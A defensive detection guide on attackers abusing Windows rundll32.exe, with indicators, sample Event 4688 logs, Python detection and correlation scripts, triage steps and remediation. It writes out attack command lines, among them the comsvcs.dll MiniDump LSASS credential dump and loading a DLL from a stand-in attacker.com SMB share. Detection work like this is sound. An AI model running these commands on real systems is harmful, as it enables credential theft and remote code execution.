Rundll32 Abuse — LOLBin Code Execution, LSASS Dump & DLL Proxy Detection
Rundll32.exe is a signed, trusted Windows binary that executes exported functions from DLL files. Attackers abuse it to load malicious DLLs, execute JavaScript and VBScript payloads, dump LSASS credentials via comsvcs.dll MiniDump, and proxy shellcode execution — all without introducing unsigned binaries that AV would flag. Because rundll32 is ubiquitous in legitimate Windows operations, detection requires command-line analysis, parent-child process inspection, and network activity correlation rather than simple process name blocking.
Severity: High
ATT&CK Tactic: Defense Evasion
Common attacker usage
- LSASS credential dump via comsvcs.dll: `rundll32.exe comsvcs.dll MiniDump <lsass_pid> lsass.dmp full` — no external tools, fully signed Microsoft binaries
- Arbitrary DLL execution: `rundll32.exe C:\Users\Public\evil.dll,EntryPoint` — runs attacker DLL with rundll32 as the host process
- JavaScript/VBScript proxy: `rundll32.exe url.dll,OpenURL javascript:...` — executes script without invoking wscript/cscript
- Remote DLL loading via UNC: `rundll32.exe \\attacker.com\share\evil.dll` — DLL fetched over SMB before execution
- INF script proxy: `rundll32.exe advpack.dll,LaunchINFSection evil.inf` — runs arbitrary commands via INF format
- Cobalt Strike and Empire use rundll32 to load reflective DLL beacon stages — avoids dropping an EXE to disk
Investigate immediately if
- comsvcs.dll and MiniDump appear in the rundll32 command line — this is LSASS credential dumping with no external tools
- rundll32.exe spawns cmd.exe, powershell.exe, wscript.exe, or mshta.exe as a child process — legitimate rundll32 calls almost never spawn shells
- The DLL path in the command line is outside System32, SysWOW64, or WinSxS — any user-writable path (Temp, AppData, Desktop) is almost always malicious
- rundll32.exe makes outbound network connections (Sysmon Event 3 or Event 5156) — system rundll32 calls are rarely network-active
MITRE ATT&CK: T1218.011 · System Binary Proxy Execution: Rundll32 (Defense Evasion)
Security Relevance
Rundll32 is among the most abused LOLBins because it is present on every Windows system, trusted by application whitelisting, signed by Microsoft, and capable of executing arbitrary code simply by loading a DLL. The comsvcs.dll MiniDump technique is particularly dangerous: it dumps LSASS credentials using two fully signed Microsoft binaries (rundll32.exe and comsvcs.dll), making it invisible to signature-based AV and bypassing RunAsPPL in environments that haven't explicitly blocked it. Attackers also use rundll32 as the final stage of a macro or script delivery chain — a phishing document runs a VBScript that calls `rundll32.exe` with a payload DLL, keeping the entire kill chain within signed or script-interpreted files.
Indicators of Malicious Use
- DLL path outside System32/SysWOW64/WinSxS in the 4688 command line — legitimate rundll32 usage loads system DLLs from known paths; any path in Temp, AppData, Downloads, Desktop, or a network share is extremely suspicious.
- `comsvcs.dll MiniDump` in the command line — LSASS credential dump using signed Windows components. No external tools required. Correlate with Event 4663 (lsass.exe object access) to confirm the dump occurred.
- `javascript:` or `vbscript:` appearing after a DLL argument — `rundll32.exe url.dll,OpenURL` executes inline script, bypassing script engine execution policies and avoiding wscript/cscript in the process list.
- UNC path DLL argument (`\\server\share\evil.dll`) — loads the DLL from an attacker-controlled SMB share; triggers an outbound SMB connection visible in firewall logs or Sysmon Event 3.
- `advpack.dll,LaunchINFSection` or `ieadvpack.dll,LaunchINFSection` — proxy execution via INF scripts; can execute arbitrary commands without spawning cmd.exe directly.
- rundll32.exe spawning child processes (cmd.exe, powershell.exe, wscript.exe, mshta.exe) — rare in legitimate use; nearly always indicates the loaded DLL executed a shell command or injected shellcode that spawned a new process.
- Ordinal-only export invocation (`rundll32.exe evil.dll #1`) — hides the function name from command-line log scanners that look for known export names; the absence of a readable function name is itself a signal.
- rundll32.exe making outbound network connections (Sysmon Event 3 or Event 5156) at unusual times or to external IPs — most legitimate rundll32 calls are local; network-active rundll32 indicates a beacon or download stage.
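The command-line indicators above can be turned into a small rule set that runs over Event 4688 command lines. The Python below is an added example, not code from the original guide or from any vendor product: the function names, the `SYSTEM_DLL_DIRS` list and every sample command line are constructed for illustration. It parses the DLL spec and export the way rundll32 reads them (`dll,Export` or `dll Export`), then applies the path, comsvcs/MiniDump, inline-script, UNC, INF-launch and ordinal checks.

```python
# Added example (not part of the original guide): a small rule set that applies
# the indicators above to Event 4688 command lines. Function names and the
# sample command lines are constructed for illustration.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Directories from which legitimate rundll32 DLL loads are expected (compared lower-case).
SYSTEM_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
)

# Quoted tokens stay together; everything else splits on whitespace.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


@dataclass
class Rundll32Call:
    dll: str      # DLL spec as written: absolute path, UNC path, or bare name
    export: str   # export name, "#N" ordinal, or "" when absent
    args: str     # everything after the export, space-joined


def parse_rundll32(cmdline: str) -> Optional[Rundll32Call]:
    """Split a rundll32 command line into DLL, export and trailing arguments."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    if not tokens or not tokens[0].lower().endswith("rundll32.exe"):
        return None  # not a rundll32 invocation
    rest = tokens[1:]
    if not rest:
        return Rundll32Call(dll="", export="", args="")
    # rundll32 accepts both "dll,Export" and "dll Export".
    if "," in rest[0]:
        dll, export = rest[0].split(",", 1)
        tail = rest[1:]
    else:
        dll = rest[0]
        export = rest[1] if len(rest) > 1 else ""
        tail = rest[2:]
    return Rundll32Call(dll=dll, export=export, args=" ".join(tail))


def is_absolute_path(dll: str) -> bool:
    """True for drive-letter paths (C:\\...) and UNC paths (\\\\server\\share)."""
    return dll.startswith("\\\\") or (len(dll) > 2 and dll[1:3] == ":\\")


def classify(cmdline: str) -> List[str]:
    """Return the indicator names that fire for one 4688 command line."""
    call = parse_rundll32(cmdline)
    if call is None:
        return []
    dll = call.dll.lower()
    base = dll.rsplit("\\", 1)[-1]
    export = call.export.lower()
    hits: List[str] = []
    if base == "comsvcs.dll" and export == "minidump":
        hits.append("comsvcs_minidump")          # LSASS dump with signed binaries only
    if dll.startswith("\\\\"):
        hits.append("unc_dll_path")              # DLL fetched over SMB before execution
    elif is_absolute_path(dll) and not dll.startswith(SYSTEM_DLL_DIRS):
        hits.append("non_system_dll_path")       # user-writable or unknown location
    if re.search(r"\b(javascript|vbscript):", call.args, re.IGNORECASE):
        hits.append("inline_script")             # url.dll,OpenURL style script proxy
    if base in ("advpack.dll", "ieadvpack.dll") and export == "launchinfsection":
        hits.append("inf_launch")                # INF section proxy execution
    if re.fullmatch(r"#\d+", export):
        hits.append("ordinal_export")            # export hidden behind an ordinal
    return hits


# Constructed sample command lines (not real incident data).
SAMPLE_4688 = [
    r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 716 C:\Windows\Temp\lsass.dmp full",
    r'"rundll32.exe" C:\Users\jsmith\AppData\Roaming\stage2.dll,MainFunc',
    r"rundll32.exe url.dll,OpenURL javascript:CONSTRUCTED_SAMPLE",
    r"rundll32.exe \\files.example.test\share\evil.dll",
    r"rundll32.exe advpack.dll,LaunchINFSection C:\Users\Public\evil.inf,DefaultInstall",
    r"rundll32.exe C:\Users\Public\evil.dll #1",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\appwiz.cpl",
    r"rundll32.exe printui.dll,PrintUIEntry /in /n \\printsrv\hp01",
]


def triage(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (cmdline, indicators) for every line that fired at least one rule."""
    out = []
    for cmd in cmdlines:
        hits = classify(cmd)
        if hits:
            out.append((cmd, hits))
    return out


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_4688):
        print(", ".join(hits).ljust(40), cmd)
```

Note the deliberate limit on the path rule: a bare DLL name such as `comsvcs.dll` or `url.dll` carries no directory, so `non_system_dll_path` only fires on an explicit drive-letter path, and UNC paths get their own indicator. Resolving which file a bare name actually loaded is what Sysmon Event 7 is for, as the guide describes further down.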
Example Log Entry
```
# Event 4688 — LSASS Dump via comsvcs.dll MiniDump (no external tools)
Log Name: Security
Event ID: 4688
New Process Information:
  New Process Name: C:\Windows\System32\rundll32.exe
  Process Command Line: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 716 C:\Windows\Temp\lsass.dmp full
  Creator Process Name: C:\Windows\System32\cmd.exe

# Event 4688 — Rundll32 loading DLL from AppData (non-system path)
Log Name: Security
Event ID: 4688
New Process Information:
  New Process Name: C:\Windows\System32\rundll32.exe
  Process Command Line: "rundll32.exe" C:\Users\jsmith\AppData\Roaming\stage2.dll,MainFunc
  Creator Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

# Event 4688 — Rundll32 spawning PowerShell (child process from loaded DLL)
Log Name: Security
Event ID: 4688
New Process Information:
  New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Process Command Line: powershell.exe -enc JABjAGwAaQBlAG4AdA...
  Creator Process Name: C:\Windows\System32\rundll32.exe
```
Investigation Steps
1. Parse the DLL path from the 4688 command line — is it in System32/SysWOW64/WinSxS? Any other path is high-priority. If comsvcs.dll MiniDump is present, pivot to the lsass-access detection guide and look for Event 4663 on lsass.exe around the same time.
2. Check the parent process of rundll32 in Event 4688 — rundll32 spawned by Word/Excel/Outlook indicates macro delivery; from wscript.exe/mshta.exe indicates script-based delivery; from cmd.exe or PowerShell indicates manual or automated attacker execution.
3. Search for child processes of rundll32.exe within 60 seconds of the Event 4688 — query 4688 for `ParentProcessName` matching rundll32. Any shell spawn (cmd, powershell, wscript) confirms the loaded DLL executed arbitrary code.
4. Check outbound network connections from rundll32.exe — search Sysmon Event 3 or Windows Firewall Event 5156 for rundll32 as the source process. UNC path connections (port 445 SMB) indicate remote DLL loading; HTTP/HTTPS connections indicate C2 or payload download.
5. Hash the suspicious DLL if it exists on disk — submit to VirusTotal or check against your EDR's known-good hash list. Legitimate Microsoft DLLs have consistent known hashes; attacker DLLs will be unknown or flagged.
6. If the command line uses a numeric ordinal (`#1`, `#2`) instead of a named export, this indicates deliberate obfuscation — use dumpbin /exports or a PE viewer to resolve the ordinal to a function name for further analysis.
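Steps 2 and 3 are a process-lineage correlation: classify the creator of rundll32.exe, then look for a shell spawned by that rundll32 instance inside the 60-second window. The Python below is an added example, not code from the original guide or from any product. It assumes 4688 records have already been normalised into dictionaries with `time`, `pid`, `image`, `parent_pid`, `parent_image` and `cmdline` keys (real 4688 records carry the creator process ID as a hex string that you would convert first); the timestamps, PIDs and command lines are constructed.

```python
# Added example (not part of the original guide): parent/child correlation over
# normalised Event 4688 records for investigation steps 2 and 3. Field names,
# timestamps, PIDs and command lines are constructed for illustration.
from datetime import datetime
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "mshta.exe", "cscript.exe"}
COMMAND_SHELLS = {"cmd.exe", "powershell.exe"}
# Children that a legitimate rundll32 call almost never spawns.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def classify_parent(creator_image: str) -> str:
    """Step 2: map the rundll32 creator process to a delivery category."""
    parent = basename(creator_image)
    if parent in OFFICE_APPS:
        return "office_macro"        # phishing document running a macro
    if parent in SCRIPT_HOSTS:
        return "script_delivery"     # VBScript / HTA stage
    if parent in COMMAND_SHELLS:
        return "shell_execution"     # manual or automated attacker execution
    return "other"


def find_rundll32_shell_spawns(events: List[Dict], window_seconds: int = 60) -> List[Dict]:
    """Step 3: rundll32 instances that spawned a shell within window_seconds."""
    rundll32_by_pid = {
        e["pid"]: e for e in events if basename(e["image"]) == "rundll32.exe"
    }
    findings = []
    for child in events:
        if basename(child["image"]) not in SUSPICIOUS_CHILDREN:
            continue
        parent = rundll32_by_pid.get(child["parent_pid"])
        # Require both the PID join and the creator name to agree (PIDs get reused).
        if parent is None or basename(child["parent_image"]) != "rundll32.exe":
            continue
        delta = (datetime.fromisoformat(child["time"])
                 - datetime.fromisoformat(parent["time"])).total_seconds()
        if 0 <= delta <= window_seconds:
            findings.append({
                "rundll32_pid": parent["pid"],
                "rundll32_cmdline": parent["cmdline"],
                "delivery": classify_parent(parent["parent_image"]),
                "child": basename(child["image"]),
                "delta_seconds": int(delta),
            })
    return findings


def _evt(time, pid, image, parent_pid, parent_image, cmdline) -> Dict:
    return {"time": time, "pid": pid, "image": image, "parent_pid": parent_pid,
            "parent_image": parent_image, "cmdline": cmdline}


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
RUNDLL32 = r"C:\Windows\System32\rundll32.exe"

# Constructed sample 4688 records: a Word macro chain plus one benign Control Panel call.
SAMPLE_EVENTS = [
    _evt("2024-05-01T10:00:00", 4120, WORD, 1200, r"C:\Windows\explorer.exe",
         "WINWORD.EXE invoice.docm"),
    _evt("2024-05-01T10:00:05", 5208, RUNDLL32, 4120, WORD,
         r"rundll32.exe C:\Users\jsmith\AppData\Roaming\stage2.dll,MainFunc"),
    _evt("2024-05-01T10:00:17", 6012,
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 5208, RUNDLL32,
         "powershell.exe -NoProfile -NonInteractive"),
    _evt("2024-05-01T10:02:00", 6300, r"C:\Windows\System32\cmd.exe", 5208, RUNDLL32,
         "cmd.exe"),
    _evt("2024-05-01T10:03:00", 7000, RUNDLL32, 1200, r"C:\Windows\explorer.exe",
         r"rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl"),
]


if __name__ == "__main__":
    for f in find_rundll32_shell_spawns(SAMPLE_EVENTS):
        print(f"[{f['delivery']}] rundll32 pid {f['rundll32_pid']} spawned "
              f"{f['child']} after {f['delta_seconds']}s: {f['rundll32_cmdline']}")
```

With the default 60-second window the run reports only the PowerShell child; the cmd.exe spawned 115 seconds later is dropped. That window is the guide's triage heuristic, not a safety boundary, so widening `window_seconds` during an investigation is the right move once one hit has confirmed the rundll32 instance as hostile.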
Common False Positives
- Windows Installer and driver setup — `rundll32.exe setupapi.dll,InstallHinfSection` is normal during driver and component installation. These are short-lived, occur during known installation windows, and the DLL is in System32.
- Printer driver management — `rundll32.exe printui.dll,PrintUIEntry` is used legitimately by Windows print management tools. Correlate with printer-related activity in the environment.
- Control Panel applets — `rundll32.exe shell32.dll,Control_RunDLL` launches .cpl files for Control Panel operations. The parent process will typically be explorer.exe or a management tool.
- Some older enterprise applications register COM objects or shell extensions by calling `rundll32.exe <component.dll>,DllRegisterServer` — verify the DLL path is a known vendor location and correlate with software deployment schedules.
Remediation
- Alert on rundll32.exe spawning cmd.exe, powershell.exe, wscript.exe, or mshta.exe child processes — this parent-child relationship has no legitimate use case and is a reliable high-confidence detection.
- Alert on rundll32.exe loading DLLs from user-writable paths (any path outside System32, SysWOW64, WinSxS, and known application directories) — this catches the majority of malicious DLL load patterns.
- Deploy WDAC or AppLocker rules that restrict rundll32.exe to loading only DLLs signed by Microsoft from trusted paths — this eliminates arbitrary DLL execution while preserving legitimate system use.
- Block outbound SMB (port 445) from workstations to external IPs — prevents UNC path remote DLL loading attacks that fetch the malicious DLL from an attacker-controlled server.
- Enable Attack Surface Reduction rule 'Block Win32 API calls from Office macros' (GUID: 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B) — this breaks the most common delivery chain (phishing document → rundll32 payload).
- Audit for comsvcs.dll MiniDump specifically — create a dedicated SIEM rule for any 4688 command line containing both 'comsvcs' and 'MiniDump'. This combination has essentially no legitimate use in production environments.
Frequently Asked Questions
- How is rundll32 abuse different from DLL hijacking?
- Rundll32 abuse explicitly invokes a malicious DLL via the rundll32.exe command line — the attacker controls the path and export name, and the activity is visible in Event 4688. DLL hijacking plants a malicious DLL in a search-order path used by a legitimate process, which loads it automatically without rundll32 being involved at all. Both result in DLL execution, but rundll32 abuse is easier to detect (it's in the command line) while DLL hijacking hides within normal application loading behavior and requires DLL load monitoring (Sysmon Event 7) to catch.
- Why does comsvcs.dll MiniDump bypass antivirus?
- Because both rundll32.exe and comsvcs.dll are signed Microsoft binaries, and MiniDump is a legitimate Windows API function used by crash reporting tools. Signature-based AV cannot block a Microsoft-signed binary calling a legitimate Windows API. Detection requires behavioral analysis — specifically, identifying that the MiniDump target is lsass.exe, not a crash reporter. LSASS process access (Event 4663) combined with the comsvcs.dll command line in 4688 is the detection chain. RunAsPPL does not protect against this technique by default; only Credential Guard (which moves LSASS secrets into a hypervisor-protected enclave) is effective.
- Can I block rundll32.exe entirely?
- Not without breaking Windows — rundll32 is used by Control Panel, printer management, driver installation, and many system functions. The practical approach is behavioral restriction via WDAC or AppLocker: allow rundll32 to load only DLLs from System32/SysWOW64, block child process spawning, and alert on non-system DLL paths. WDAC-enforced signing requirements mean attacker DLLs (unsigned or with untrusted signatures) fail to load before they execute. This preserves legitimate use while eliminating the vast majority of attack techniques.
- Does Sysmon significantly improve rundll32 detection?
- Yes — substantially. Windows native Event 4688 captures the command line, but Sysmon adds three critical dimensions: Event 1 (process creation) includes the full command line plus file hashes and parent command line; Event 3 (network connection) captures outbound connections from rundll32.exe that reveal C2 or remote DLL loading; Event 7 (DLL load) tracks every DLL loaded into rundll32, making ordinal-only invocations visible by resolving which DLL was actually loaded. Without Sysmon, network and DLL load activity from rundll32 requires firewall/EDR telemetry to detect.